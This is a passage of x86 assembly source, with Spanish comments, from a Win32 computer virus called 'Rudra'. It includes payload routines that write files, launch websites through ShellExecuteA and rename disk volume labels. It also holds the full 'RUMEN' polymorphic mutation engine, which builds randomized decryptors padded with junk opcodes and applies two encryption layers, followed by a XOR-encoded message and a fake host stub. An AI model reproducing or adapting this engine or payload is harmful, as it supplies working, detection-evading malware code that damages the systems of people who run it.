@CD2: APICALL _lcreat
MOV DWO [FHandle], EAX
POP ECX
LEA EDI, OFS [Idioteces]
XOR AL, AL
@CD3:
SCASB
JNZ @CD3
LOOP @CD3
PUSH EDI
XOR ECX, ECX
@CD4:
INC ECX
SCASB
JNZ @CD4
POP EDI
PUSH ECX
PUSH EDI
PUSH DWO [FHandle]
APICALL _lwrite
PUSH DWO [FHandle]
APICALL CloseHandle
JMP @Retorna_Paylo
@PonerSitios:
CALL @PS1
DB "SHELL32.DLL", 00h, 90h, 90h
@PS1: APICALL LoadLibraryA
OR EAX, EAX
JZ @Retorna_Paylo
CALL @PS2
DB "ShellExecuteA", 00h, 90h, 90h, 90h, 90h
@PS2: PUSH EAX
APICALL GetProcAddress
OR EAX, EAX
JZ @Retorna_Paylo
PUSH EAX
PUSH 05d
POP EBX
CALL @Puyalo
LEA EDI, OFS [Sitios_Web]
XCHG ECX, EAX
XOR AL, AL
@PS3:
SCASB
JNZ @PS3
LOOP @PS3
POP EAX
XOR EBX, EBX
PUSH SW_SHOW
PUSH EBX
PUSH EBX
PUSH EDI
PUSH EBX
PUSH EBX
CALL EAX
JMP @Retorna_Paylo
@CambiarVolumen:
PUSH 06d
POP EBX
CALL @Puyalo
XCHG ECX, EAX
XOR AL, AL
LEA EDI, OFS [Volumenz]
@CV1:
SCASB
JNZ @CV1
PUSH EDI
PUSH NULL
APICALL SetVolumeLabelA
JMP @Retorna_Paylo
Puyado DD 00000000h
Paylo ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; RUMEN: Rudra Mutation Engine.
;
; EDI -> Donde guardar el virus encriptado.
; ESI -> Codigo a encriptar.
; ECX -> Tama¤o del codigo a encriptar.
RUMEN PROC
MOV DWO [Guarda_DC], EDI
MOV DWO [Tama¤o_EC], ECX
LEA EAX, OFS [Fecha]
PUSH EAX
APICALL GetSystemTime
MOV AX, WO [Ultimo_Dia]
CMP WO [Fecha.wDay], AX
JE @Semillas_Listas
MOV AX, WO [Fecha.wDay]
MOV WO [Ultimo_Dia], AX
APICALL GetTickCount
MOV DWO [Aleat], EAX ; inicializar la semilla
RDTSC
XCHG EBX, EAX
CALL Random
MOV DWO [Llave], EAX
RDTSC
XCHG EBX, EDX
CALL Random
MOV WO [Llave_II], AX
@Semillas_Listas:
CALL @Segunda_Capa
CALL @Colocar_Opcodes
LEA ESI, OFS [@I0]
MOVSD
MOVSB
CALL @Colocar_Opcodes
LEA ESI, OFS [@I1]
MOVSB
CALL @Colocar_Opcodes
LEA ESI, OFS [@I2]
MOVSW
MOVSD
CALL @Colocar_Opcodes
LEA ESI, OFS [@I3]
MOVSD
MOVSW
CALL @Colocar_Opcodes
LEA ESI, OFS [@I4]
MOVSD
MOVSB
CALL @Colocar_Opcodes
LEA ESI, OFS [@I5]
MOVSW
MOV EAX, DWO [Llave]
STOSD
CALL @Colocar_Opcodes
LEA ESI, OFS [@I6]
MOVSW
MOVSB
CALL @Colocar_Opcodes
LEA ESI, OFS [@I7]
MOVSW
; ya esta hecho el desencriptor... ahora...
MOV ESI, DWO [Memoria]
MOV EAX, DWO [Tama¤o_EC]
MOV EBX, 00000004h
XOR EDX, EDX
DIV EBX
XCHG EAX, ECX
MOV EAX, DWO [Llave]
@EC:
MOVSD
XOR DWORD PTR [EDI-4h], EAX
LOOP @EC
PUSH EDI
PUSH MEM_DECOMMIT
PUSH Tama¤o_Virus
PUSH DWO [Memoria]
APICALL VirtualFree
POP EDI
RET
Guarda_DC DD 00000000h
Tama¤o_EC DD 00000000h
Llave DD 00000000h
Memoria DD 00000000h
Ultimo_Dia DW 0000h
; Instrucciones esenciales
DB 24d DUP (90h)
@I0: DB 0E8h, 00h, 00h, 00h, 00h ; CALL Delta
DB 24d DUP (90h)
@I1: POP EBP
DB 24d DUP (90h)
@I2: SUB EBP, OFFSET DELTA
DB 24d DUP (90h)
@I3: LEA EDI, OFS [Empieza_Virus]
DB 24d DUP (90h)
@I4: MOV ECX, Tama¤o_Virus / 4
DB 24d DUP (90h)
@I5: DB 081h, 037h
DB 24d DUP (90h)
@I6: ADD EDI, 04h
DB 24d DUP (90h)
@I7: LOOP (@I5)-4d
; De Seis bytes.
@6Bytes:
DB 081h, 0C3h ; ADD EBX
DB 081h, 0C2h ; ADD EDX
DB 081h, 0C6h ; ADD ESI
DB 081h, 0EBh ; SUB EBX
DB 081h, 0EAh ; SUB EDX
DB 081h, 0EEh ; SUB ESI
DB 081h, 0F3h ; XOR EBX
DB 081h, 0F2h ; XOR EDX
DB 081h, 0F6h ; XOR ESI
DB 069h, 0C0h ; IMUL EAX
DB 069h, 0DBh ; IMUL EBX
DB 069h, 0D2h ; IMUL EDX
DB 069h, 0F6h ; IMUL ESI
DB 081h, 0E3h ; AND EBX
DB 081h, 0E2h ; AND EDX
DB 081h, 0E6h ; AND ESI
DB 081h, 0CBh ; OR EBX
DB 081h, 0CAh ; OR EDX
DB 081h, 0CEh ; OR ESI
; Colocar un opcode de seis bytes...
@Meter_Opcode_6B:
PUSH 018d
POP EBX
CALL Random
IMUL EAX, 02h
LEA ESI, OFS [@6Bytes]
ADD ESI, EAX
MOVSW
XOR EBX, EBX
DEC EBX
CALL Random
MOVSD
RET
; Instrucciones de cinco bytes.
@5Bytes:
DB 0B8h ; MOV EAX
DB 0BBh ; MOV EBX
DB 0BAh ; MOV EDX
DB 0BEh ; MOV ESI
DB 005h ; ADD EAX
DB 02Dh ; SUB EAX
DB 035h ; XOR EAX
DB 025h ; AND EAX
DB 0D7h ; OR EAX
; Colocar un opcode de cinco bytes.
@Meter_Opcode_5B:
PUSH 08d
POP EBX
CALL Random
LEA ESI, OFS [@5Bytes]
ADD ESI, EAX
MOVSB
XOR EBX, EBX
DEC EBX
CALL Random
MOVSD
RET
; Intrucciones de dos bytes.
@2Bytes:
DB 001h, 0C0h ; ADD EAX, EAX
DB 031h, 0C0h ; XOR EAX, EAX
DB 001h, 0DBh ; ADD EBX, EBX
DB 031h, 0DBh ; XOR EBX, EBX
DB 001h, 0D2h ; ADD EDX, EDX
DB 031h, 0D2h ; XOR EDX, EDX
DB 001h, 0D8h ; ADD EAX, EBX
DB 001h, 0D0h ; ADD EAX, EDX
DB 031h, 0D8h ; XOR EAX, EBX
DB 031h, 0D0h ; XOR EAX, EDX
DB 031h, 0C3h ; XOR EBX, EAX
DB 031h, 0D3h ; XOR EBX, EDX
DB 031h, 0C2h ; XOR EDX, EAX
DB 031h, 0DAh ; XOR EDX, EBX
DB 001h, 0F6h ; ADD ESI, ESI
DB 031h, 0F6h ; XOR ESI, ESI
@Meter_Opcode_2B:
PUSH 15d
POP EBX
CALL Random
ADD EAX, EAX
LEA ESI, OFS [@2Bytes]
ADD ESI, EAX
MOVSB
MOVSB
RET
; Instrucciones de un byte.
@1Byte:
DB 046h ; INC ESI
DB 04Eh ; DEC ESI
DB 040h ; INC EDX
DB 042h ; INC EAX
DB 043h ; INC EBX
DB 04Ah ; DEC EDX
DB 048h ; DEC EAX
DB 04Bh ; DEC EBX
DB 092h ; XCHG EDX, EAX
DB 093h ; XCHG EBX, EAX
DB 096h ; XCHG ESI, EAX
; Colocar opcode de un byte.
@Meter_Opcode_1B:
PUSH 10d
POP EBX
CALL Random
LEA ESI, OFS [@1Byte]
ADD ESI, EAX
MOVSB
RET
; Este proceso rellena cada bloque de 24 bytes con varias combinaciones
; diferentes de opcodes.
@Colocar_Opcodes:
PUSH 04d
POP ECX
@CO_1:
; Manera1: 20% 0-20
; Manera2: 20% 20-40
; Manera3: 20% 40-60
; Manera4: 10% 60-70
; Manera5: 15% 70-85
; Manera6: 15% 85-100
PUSH 20d
POP EBX
CALL Random
CMP AL, 4d
JBE @CO_Manera1
CMP AL, 8d
JBE @CO_Manera2
CMP AL, 12d
JBE @CO_Manera3
CMP AL, 14d
JBE @CO_Manera4
CMP AL, 17d
JBE @CO_Manera5
CMP AL, 20d
JBE @CO_Manera6
JMP @CO_1
@CO_Regresa:
LOOP @CO_1
RET
@CO_Manera1:
CALL @Meter_Opcode_6B
JMP @CO_Regresa
@CO_Manera2:
CALL @Meter_Opcode_1B
CALL @Meter_Opcode_5B
JMP @CO_Regresa
@CO_Manera3:
CALL @Meter_Opcode_5B
CALL @Meter_Opcode_1B
JMP @CO_Regresa
@CO_Manera4:
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_2B
JMP @CO_Regresa
@CO_Manera5:
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_1B
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_1B
JMP @CO_Regresa
@CO_Manera6:
CALL @Meter_Opcode_1B
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_2B
CALL @Meter_Opcode_1B
JMP @CO_Regresa
; Generador de numeros aleatorios de congruencia linear.
;
; EBX -> Limite superior.
; Retorna en EAX el numero aleatorio.
Random:
PUSH ECX
MOV EAX, DWO [Aleat]
IMUL EAX, EAX, 036FB5419h
ADD EAX, 00004A6Dh
MOV DWO [Aleat], EAX
XOR EDX, EDX
DIV EBX
XCHG EDX, EAX
POP ECX
RET
; Proceso para copiar la segunda capa de encriptacion.
@Segunda_Capa:
PUSHAD
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH Tama¤o_Virus
PUSH NULL
APICALL VirtualAlloc
MOV DWO [Memoria], EAX
OR EAX, EAX
JZ @NosJodimos
MOV EDI, EAX
LEA ESI, OFS [Empieza_Virus]
MOV ECX, (Empieza_Layer2 - Empieza_Virus)
REP MOVSB
MOV AX, WO [Llave_II]
MOV ECX, Tama¤o_Layer2 / 2
@@JO:
MOVSW
ADD WORD PTR [EDI-2h], AX
LOOP @@JO
@NosJodimos:
POPAD
RET
Aleat DD 00000000h
RUMEN ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
NOP
DB "R" XOR 43h
DB "e" XOR 43h
DB "c" XOR 43h
DB "u" XOR 43h
DB "e" XOR 43h
DB "r" XOR 43h
DB "d" XOR 43h
DB "a" XOR 43h
DB " " XOR 43h
DB "e" XOR 43h
DB "l" XOR 43h
DB " " XOR 43h
DB "4" XOR 43h
DB " " XOR 43h
DB "d" XOR 43h
DB "e" XOR 43h
DB " " XOR 43h
DB "F" XOR 43h
DB "e" XOR 43h
DB "b" XOR 43h
DB "r" XOR 43h
DB "e" XOR 43h
DB "r" XOR 43h
DB "o" XOR 43h
DB " " XOR 43h
DB "d" XOR 43h
DB "e" XOR 43h
DB " " XOR 43h
DB "1" XOR 43h
DB "9" XOR 43h
DB "9" XOR 43h
DB "2" XOR 43h
DB "." XOR 43h
DB "." XOR 43h
DB "." XOR 43h
DB 43h
Termina_Virus LABEL NEAR
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Host_Falso PROC
CALL MessageBoxA, 0, OFFSET Ventana, OFFSET Titulo, 0
CALL ExitProcess, 0
Host_Falso ENDP
End Rudra